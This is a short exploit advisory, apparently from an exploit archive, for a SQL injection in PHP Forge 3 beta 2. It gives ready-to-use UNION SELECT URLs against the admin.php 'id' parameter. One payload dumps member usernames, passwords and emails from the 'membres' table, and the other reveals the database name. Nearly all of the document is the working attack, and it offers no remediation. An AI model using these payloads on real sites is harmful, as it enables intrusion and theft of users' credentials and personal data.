PHP Forge <= 3 beta 2 (id) Remote SQL Injection Vulnerability

=============================================================
PHP Forge <= 3 beta 2 (id) Remote SQL Injection Vulnerability
=============================================================



=========================================================
=============== JIKI TEAM [ Maroc And YameN ]===============
=========================================================
# Author  : jiko
# Script  : Forge 3.0 beta
# Bug   : Remote SQL Injection Vulnerability
# Download  : http://membres.lycos.fr/phpforge/downloads/phpforge3b2.tar.gz
=========================JIkI Team===================
# Exploit  :
 http://[Site]/[script]/http://localhost/script/phpforge3/admin.php?module=news&p=modifier&id=-1 union select 0,identifiant,mdp,pseudo,email,description,6,7 from membres--
# Ex :
http://localhost/script/phpforge3/admin.php?module=news&p=modifier&id=-1  union  select  0,1,database(),3,4,5,6,7  from  membres--
=========================================================




#  0day.today [2018-04-14]  #